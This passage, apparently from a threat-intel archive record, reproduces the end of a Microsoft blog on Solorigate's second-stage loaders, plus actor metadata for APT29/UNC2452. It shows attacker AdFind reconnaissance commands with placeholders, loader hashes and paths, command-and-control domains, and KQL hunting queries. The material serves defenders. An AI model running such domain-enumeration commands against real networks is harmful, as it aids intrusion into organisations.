blend\r\ninto the existing\r\nenvironment or mimicking\r\nexisting network services.\r\n[renamed-adfind].exe -h [internal domain] -sc u:\r\n[user] \u003e .\\\\[machine]\\[file].[log|txt][renamed-adfind].exe -sc u:* \u003e .\\[folder]\\[file].[log|txt]\r\n[renamed-adfind].exe -h [machine] -f\r\n(name=”Domain Admins”) member -list |\r\n[renamed-adfind].exe -h [machine] -f\r\nobjectcategory=* \u003e .\\[folder]\\[file].[log|txt]Some\r\nexamples of [renamed-adfind] observed by\r\nMicrosoft and other security researchers::\r\nSearchIndex.exe\r\nsqlceip.exe\r\npostgres.exe\r\nIxNetwork.exe\r\ncsrss.exe\r\nT1482 | Domain\r\nTrust\r\nDiscovery, T1018 |\r\nRemote System\r\nDiscovery\r\nConclusion\r\nAs we continue to gain deeper understanding of the Solorigate attack, we get a clearer picture of the skill level of the\r\nattackers and the extent of planning they put into pulling off one of the most sophisticated attacks in recent history. The\r\ncombination of a complex attack chain and a protracted operation means that defensive solutions need to have\r\ncomprehensive cross-domain visibility into attacker activity and provide months of historical data with powerful hunting\r\ntools to investigate as far back as necessary.\r\nModern attacks like Solorigate highlight the need for organizations to use advanced security solutions like Microsoft 365\r\nDefender and Azure Sentinel and operate security response under an “assume breach” mentality. Microsoft 365 Defender\r\nharnesses the power of multiple capabilities and coordinates protection across domains to provide comprehensive defense.\r\nAzure Sentinel collects data from multiple data sources, including Microsoft 365 Defender, to connect data together and\r\nallow broad hunting for attacker activity.\r\nIn our ongoing forensic analysis of known Solorigate cases with malicious activity occurring between May and November\r\n2020, we have in some instances seen the following relevant alerts generated by Microsoft Defender for Endpoint and\r\nMicrosoft Defender for Identity. Incident responders and defenders investigating Solorigate incidents during that timeframe\r\ncan refer to these alerts, alone or in combination, as potential indicators of the Solorigate activity.\r\nMicrosoft Defender for Endpoint alerts:\r\nLow-reputation arbitrary code executed by signed executable\r\nSuspicious ‘Atosev’ behavior was blocked\r\nSuspicious Remote WMI Execution\r\nA WMI event filter was bound to a suspicious event consumer\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 16 of 21\n\nMicrosoft Defender for Identity alerts:\r\nUser and IP address reconnaissance (SMB)\r\nSuspected Kerberos SPN exposure\r\nFigure 11. Alert raised by Microsoft Defender for Endpoint on Solorigate-related malicious activity in June 2020\r\nThe disclosure of the Solorigate attack and the investigations that followed unearthed more details and intelligence that we\r\nused to improve existing detections and build new ones. Security operations teams looking to get a comprehensive guide on\r\ndetecting and investigating Solorigate can refer to Using Microsoft 365 Defender to protect against Solorigate.\r\nMeanwhile, security administrators can use the recommendations for hardening networks against Solorigate and similar\r\nsophisticated cyberattacks outlined in Increasing resilience against Solorigate and other sophisticated attacks with\r\nMicrosoft Defender.\r\nTo get the latest information and guidance from Microsoft, visit https://aka.ms/solorigate.\r\nMicrosoft 365 Defender Research Team\r\nMicrosoft Threat Intelligence Center (MSTIC)\r\nMicrosoft Cyber Defense Operations Center (CDOC)\r\nIndicators of compromise (IoCs)\r\nCustom Cobalt Strike Beacon loader (SHA-256):\r\n118189f90da3788362fe85eafa555298423e21ec37f147f3bf88c61d4cd46c51\r\n1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 17 of 21\n\n1ec138f21a315722fb702706b4bdc0f544317f130f4a009502ec98345f85e4ad\r\n2a276f4b11f47f81dd2bcb850a158d4202df836769da5a23e56bf0353281473e\r\n327f1d94bc26779cbe20f8689be12c7eee2e390fbddb40b92ad00b1cddfd6426\r\n3985dea8e467c56e8cc44ebfc201253ffee923765d12808aaf17db2c644c4c06\r\n557f91404fb821d7c1e98d9f2f5296dc12712fc19c87a84602442b4637fb23d4\r\n5cf85c3d18cd6dba8377370883a0fffda59767839156add4c8912394f76d6ef0\r\n5f8650ca0ed22ad0d4127eb4086d4548ec31ad035c7aec12c6e82cb64417a390\r\n674075c8f63c64ad5fa6fd5e2aa6e4954afae594e7b0f07670e4322a60f3d0cf\r\n6ff3a4f7fd7dc793e866708ab0fe592e6c08156b1aa3552a8d74e331f1aea377\r\n7c68f8d80fc2a6347da7c196d5f91861ba889afb51a4da4a6c282e06ef5bdb7e\r\n915705c09b4bd108bcd123fe35f20a16d8c9c7d38d93820e8c167695a890b214\r\n948bfdfad43ad52ca09890a4d2515079c29bdfe02edaa53e7d92858aa2dfbe4c\r\n955609cf0b4ea38b409d523a0f675d8404fee55c458ad079b4031e02433fdbf3\r\nb348546f4c6a9bcafd81015132f09cf8313420eb653673bf3d65046427b1167f\r\nb35e0010e0734fcd9b5952ae93459544ae33485fe0662fae715092e0dfb92ad3\r\nb820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07\r\nbe9dbbec6937dfe0a652c0603d4972ba354e83c06b8397d6555fd1847da36725\r\nc5a818d9b95e1c548d6af22b5e8663a2410e6d4ed87df7f9daf7df0ef029872e\r\nc741797dd400de5927f8b5317165fc755d6439749c39c380a1357eac0a00f90c\r\nc7924cc1bc388cfcdc2ee2472899cd34a2ef4414134cbc23a7cb530650f93d98\r\nc96b7a3c9acf704189ae8d6124b5a7b1f0e8c83c246b59bc5ff15e17b7de4c84\r\ncbbe224d9854d6a4269ed2fa9b22d77681f84e3ca4e5d6891414479471f5ca68\r\ncdd9b4252ef2f6e64bccc91146ec5dc51d94e2761184cd0ffa9909aa739fa17e\r\ndbd26ccb3699f426dc6799e218b91d1a3c1d08ad3006bc2880e29c755a4e2338\r\ne60e1bb967db273b922deeea32d56fc6d9501a236856ef9a3e5f76c1f392000a\r\nf2d38a29f6727f4ade62d88d8a68de0d52a0695930b8c92437a2f9e4de92e418\r\nf61a37aa8581986ba600286d65bb76100fb44e347e253f1f5ad50051e5f882f5\r\nf81987f1484bfe5441be157250b35b0a2d7991cf9272fa4eacd3e9f0dee235de\r\nFile paths for the custom Cobalt Strike Beacon loader:\r\nC:\\Windows\\ms\\sms\\sms.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\sbscmp30.dll\r\nC:\\Windows\\AUInstallAgent\\auagent.dll\r\nC:\\Windows\\apppatch\\apppatch64\\sysmain.dll\r\nC:\\Windows\\Vss\\Writers\\Application\\AppXML.dll\r\nC:\\Windows\\PCHEALTH\\health.dll\r\nC:\\Windows\\Registration\\crmlog.dll\r\nC:\\Windows\\Cursors\\cursrv.dll\r\nC:\\Windows\\AppPatch\\AcWin.dll\r\nC:\\Windows\\CbsTemp\\cbst.dll\r\nC:\\Windows\\AppReadiness\\Appapi.dll\r\nC:\\Windows\\Panther\\MainQueueOnline.dll\r\nC:\\Windows\\AppReadiness\\AppRead.dll\r\nC:\\Windows\\PrintDialog\\PrintDial.dll\r\nC:\\Windows\\ShellExperiences\\MtUvc.dll\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 18 of 21\n\nC:\\Windows\\PrintDialog\\appxsig.dll\r\nC:\\Windows\\DigitalLocker\\lock.dll\r\nC:\\Windows\\assembly\\GAC_64\\MSBuild\\3.5.0.0__b03f5f7f11d50a3a\\msbuild.dll\r\nC:\\Windows\\Migration\\WTR\\ctl.dll\r\nC:\\Windows\\ELAMBKUP\\WdBoot.dll\r\nC:\\Windows\\LiveKernelReports\\KerRep.dll\r\nC:\\Windows\\Speech_OneCore\\Engines\\TTS\\en-US\\enUS.Name.dll\r\nC:\\Windows\\SoftwareDistribution\\DataStore\\DataStr.dll\r\nC:\\Windows\\RemotePackages\\RemoteApps\\RemPack.dll\r\nC:\\Windows\\ShellComponents\\TaskFlow.dll\r\nCobalt Strike Beacon:\r\naimsecurity[.]net\r\ndatazr[.]com\r\nervsystem[.]com\r\nfinancialmarket[.]org\r\ngallerycenter[.]org\r\ninfinitysoftwares[.]com\r\nmobilnweb[.]com\r\nolapdatabase[.]com\r\nswipeservice[.]com\r\ntechiefly[.]com\r\nAdvanced hunting queries\r\nA collection of Advanced Hunting Queries (AHQ) related to Solorigate is located in our AHQ repository in GitHub. To\r\nlocate possible exploitation activity related to the contents of this blog, you can run the following advanced hunting queries\r\nvia Microsoft Defender for Endpoint:\r\nAnomalous usage of 7zip\r\nLook for anomalous usage or running process of 7zip. Run query in Microsoft Defender for Endpoint.\r\nDeviceProcessEvents\r\n| where InitiatingProcessFileName in~(\"rundll32.exe\", \"dllhost.exe\")\r\nand InitiatingProcessCommandLine != \"\"\r\nand InitiatingProcessCommandLine !contains \" \"\r\n| extend RundllTime = Timestamp\r\n| join DeviceProcessEvents on $left.DeviceId == $right.DeviceId\r\n| where InitiatingProcessFileName hasprefix \"7z\"\r\nor InitiatingProcessCommandLine has \"-mx9\"\r\n| extend DateDiff = datetime_diff(\"day\", Timestamp, RundllTime)\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 19 of 21\n\n| where DateDiff \u003c 2\r\nPresence of custom Cobalt Strike\r\nLook for presence of custom cobalt strike loaders. Run query in Microsoft Defender for Endpoint.\r\nDeviceProcessEvents\r\n| where FileName =~ \"rundll32.exe\"\r\n| where InitiatingProcessIntegrityLevel in (\"High\", \"System\")\r\n| where ProcessCommandLine matches regex\r\n@'(?i)rundll32\\s+c\\:\\\\windows(\\\\[^\\\\]+)+\\.dll\\s+[a-zA-Z0-9_]{3,}'\r\nCommand and control\r\nLook for command-and-control connections. Run query in Microsoft Defender for Endpoint.\r\nDeviceNetworkEvents\r\n| where InitiatingProcessParentFileName =~ \"rundll32.exe\"\r\n| where InitiatingProcessFileName =~ \"dllhost.exe\"\r\nand InitiatingProcessCommandLine != \"\"\r\nand InitiatingProcessCommandLine !contains \" \"\r\nLook for network connections to known command and control domains. Run query in Microsoft Defender for Endpoint.\r\nDeviceNetworkEvents\r\n| where RemoteUrl in~('aimsecurity.net',\r\n'datazr.com',\r\n'ervsystem.com',\r\n'financialmarket.org',\r\n'gallerycenter.org',\r\n'infinitysoftwares.com',\r\n'mobilnweb.com',\r\n'olapdatabase.com',\r\n'swipeservice.com',\r\n'techiefly.com')\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 20 of 21\n\nSource: https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindro\r\np/\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/" ], "report_names": [ "deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434811, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a8440c5ab81f56ad010d64479dc9007c203eab1c.pdf", "text": "https://archive.orkl.eu/a8440c5ab81f56ad010d64479dc9007c203eab1c.txt", "img": "https://archive.orkl.eu/a8440c5ab81f56ad010d64479dc9007c203eab1c.jpg" } }